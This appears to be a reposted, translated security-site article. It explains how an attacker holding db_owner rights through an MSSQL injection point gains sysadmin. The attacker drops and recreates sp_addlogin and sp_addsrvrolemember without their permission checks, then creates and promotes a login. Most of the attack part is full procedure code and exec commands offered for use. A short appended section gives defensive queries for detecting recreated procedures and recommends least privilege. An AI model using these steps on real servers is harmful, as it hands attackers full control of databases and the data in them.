MSSQL injection killer: as long as there is an injection point, there is system permission

Source: Internet
Author: User
I don't know whether you have read this article: you can add a sysadmin account from the db_owner role. This is a truly tough move, and servers with an MSSQL injection vulnerability will suffer again. The core method is to use db_owner to modify the sp_addlogin and sp_addsrvrolemember stored procedures so that they bypass their verification section. The specific steps are as follows: first submit drop procedure sp_addlogin, then submit the following create procedure sp_addlogin through IE:

create procedure sp_addlogin
    @loginame       sysname
    ,@passwd        sysname = null
    ,@defdb         sysname = 'master'      -- undone: default retriable???
    ,@deflanguage   sysname = null
    ,@sid           varbinary(16) = null
    ,@encryptopt    varchar(20) = null
as
    -- setup runtime options / declare variables --
    set nocount on
    declare @ret int    -- return value of sp call

    -- disallow user transaction --
    set implicit_transactions off
    if (@@trancount > 0)
    begin
        raiserror(15002,-1,-1,'sp_addlogin')
        return (1)
    end

    -- validate login name:
    --  (1) valid SQL name (SQL login)
    --  (2) no backslash (NT users only)
    --  (3) not a reserved login name
    execute @ret = sp_validname @loginame
    if (@ret <> 0)
        return (1)
    if (charindex('\', @loginame) > 0)
    begin
        raiserror(15006,-1,-1,@loginame)
        return (1)
    end

    -- note: different-case sa is allowed.
    if (@loginame = 'sa' or lower(@loginame) in ('public'))
    begin
        raiserror(15405,-1,-1,@loginame)
        return (1)
    end

    -- login name must not already exist --
    if exists (select * from master.dbo.syslogins where loginname = @loginame)
    begin
        raiserror(15025,-1,-1,@loginame)
        return (1)
    end

    -- validate default database --
    if db_id(@defdb) is null
    begin
        raiserror(15010,-1,-1,@defdb)
        return (1)
    end

    -- validate default language --
    if (@deflanguage is not null)
    begin
        execute @ret = sp_validlang @deflanguage
        if (@ret <> 0)
            return (1)
    end
    else
    begin
        select @deflanguage = name from master.dbo.syslanguages
            where langid = @@default_langid     -- server default language
        if @deflanguage is null
            select @deflanguage = N'us_english'
    end

    -- validate sid if given --
    if ((@sid is not null) and (datalength(@sid) <> 16))
    begin
        raiserror(15419,-1,-1)
        return (1)
    end
    else if @sid is null
        select @sid = newid()
    if (suser_sname(@sid) is not null)
    begin
        raiserror(15433,-1,-1)
        return (1)
    end

    -- validate and use encryption option --
    declare @xstatus smallint
    select @xstatus = 2     -- access
    if @encryptopt is null
        select @passwd = pwdencrypt(@passwd)
    else if @encryptopt = 'skip_encryption_old'
    begin
        select @xstatus = @xstatus | 0x800,     -- old-style encryption
               @passwd = convert(sysname, convert(varbinary(30), convert(varchar(30), @passwd)))
    end
    else if @encryptopt <> 'skip_encryption'
    begin
        raiserror(15600,-1,-1,'sp_addlogin')
        return 1
    end

    -- attempt the insert of the new login --
    insert into master.dbo.sysxlogins values
        (null, @sid, @xstatus, getdate(), getdate(), @loginame,
         convert(varbinary(256), @passwd), db_id(@defdb), @deflanguage)
    if @@error <> 0     -- this indicates we saw a duplicate row
        return (1)

    -- update protection timestamp for master db, to indicate syslogins change --
    exec('use master grant all to null')

    -- finalization: return success/failure --
    raiserror(15298,-1,-1)
    return (0)      -- sp_addlogin

go

OK. Now create the new login: exec master..sp_addlogin xwq

Next, drop procedure sp_addsrvrolemember and enter:

create procedure sp_addsrvrolemember
    @loginame   sysname,            -- login name
    @rolename   sysname = null      -- server role name
as
    -- setup runtime options / declare variables --
    set nocount on
    declare @ret        int,        -- return value of sp call
            @rolebit    smallint,
            @ismem      int

    -- disallow user transaction --
    set implicit_transactions off
    if (@@trancount > 0)
    begin
        raiserror(15002,-1,-1,'sp_addsrvrolemember')
        return (1)
    end

    -- cannot change sa roles --
    if @loginame = 'sa'
    begin
        raiserror(15405,-1,-1,@loginame)
        return (1)
    end

    -- obtain the bit for this role --
    select @rolebit = case @rolename
                        when 'sysadmin'      then 16
                        when 'securityadmin' then 32
                        when 'serveradmin'   then 64
                        when 'setupadmin'    then 128
                        when 'processadmin'  then 256
                        when 'diskadmin'     then 512
                        when 'dbcreator'     then 1024
                        when 'bulkadmin'     then 4096
                        else null end

    -- add row for NT login if needed --
    if not exists (select * from master.dbo.syslogins where loginname = @loginame)
    begin
        execute @ret = sp_msaddlogin_implicit_ntlogin @loginame
        if (@ret <> 0)
        begin
            raiserror(15007,-1,-1,@loginame)
            return (1)
        end
    end

    -- update role membership --
    update master.dbo.sysxlogins set xstatus = xstatus | @rolebit, xdate2 = getdate()
        where name = @loginame and srvid is null

    -- update protection timestamp for master db, to indicate syslogins change --
    exec('use master grant all to null')

    raiserror(15488,-1,-1,@loginame,@rolename)

    -- finalization: return success/failure --
    return (@@error)    -- sp_addsrvrolemember

go

Then run exec master..sp_addsrvrolemember xwq, sysadmin

In this way a login with the sysadmin (SA-level) role is created, and you can connect with a SQL client. Nice. However, when executing these SQL commands through NB in practice, an error is raised, probably because the code is too long, and submitting it through IE is inconvenient, so use whichever tool lets you execute SQL statements conveniently. OK, that is the end.
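As an added defensive check, which is not part of the original article, the following T-SQL lists stored procedures in master that carry a system-procedure name but that SQL Server does not mark as Microsoft-shipped. A procedure that was dropped and recreated by a user, as above, loses that flag and its creation date becomes the time of the recreation rather than the install date. The first query uses the SQL Server 2000 catalog (master.dbo.sysobjects and OBJECTPROPERTY 'IsMSShipped'); the last query is the equivalent for SQL Server 2005 and later, where the real system procedures live in the Resource database and cannot be dropped, so any object of that name found in master.dbo is user-created. The LIKE 'sp[_]%' filter is a deliberately broad assumption and will also list legitimately user-created procedures, which should simply be reviewed.

```sql
-- Added example (not from the original article): find system stored procedures
-- in master that have been dropped and recreated as ordinary user objects.
USE master;
GO

-- SQL Server 2000: genuine system procedures carry the MS-shipped flag.
-- A recreated sp_addlogin / sp_addsrvrolemember shows is_ms_shipped = 0
-- and a crdate equal to the time of the recreation.
SELECT  o.name,
        o.crdate,
        OBJECTPROPERTY(o.id, 'IsMSShipped') AS is_ms_shipped,
        USER_NAME(o.uid)                    AS owner_name
FROM    master.dbo.sysobjects AS o
WHERE   o.xtype = 'P'
  AND   o.name LIKE 'sp[_]%'
  AND   OBJECTPROPERTY(o.id, 'IsMSShipped') = 0
ORDER BY o.crdate DESC;

-- Then compare the current body with a known-good copy from an untouched
-- instance: the permission check (the is_srvrolemember test near the top of
-- each procedure) must still be present.
EXEC sp_helptext 'sp_addlogin';
EXEC sp_helptext 'sp_addsrvrolemember';

-- SQL Server 2005 and later: the real procedures are in the Resource database,
-- so anything of that name in master.dbo is a user object and deserves review.
SELECT  o.name, o.create_date, o.modify_date, o.is_ms_shipped
FROM    master.sys.objects AS o
WHERE   o.type = 'P'
  AND   o.name LIKE 'sp[_]%'
  AND   o.is_ms_shipped = 0
ORDER BY o.modify_date DESC;
```

Run these from a sysadmin session; an empty result for the first and last queries is the expected state on an unmodified server. Beyond detection, the underlying exposure is the injectable application connecting with a login that has db_owner rights in master, so the durable fix is a least-privilege application login together with parameterised queries.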
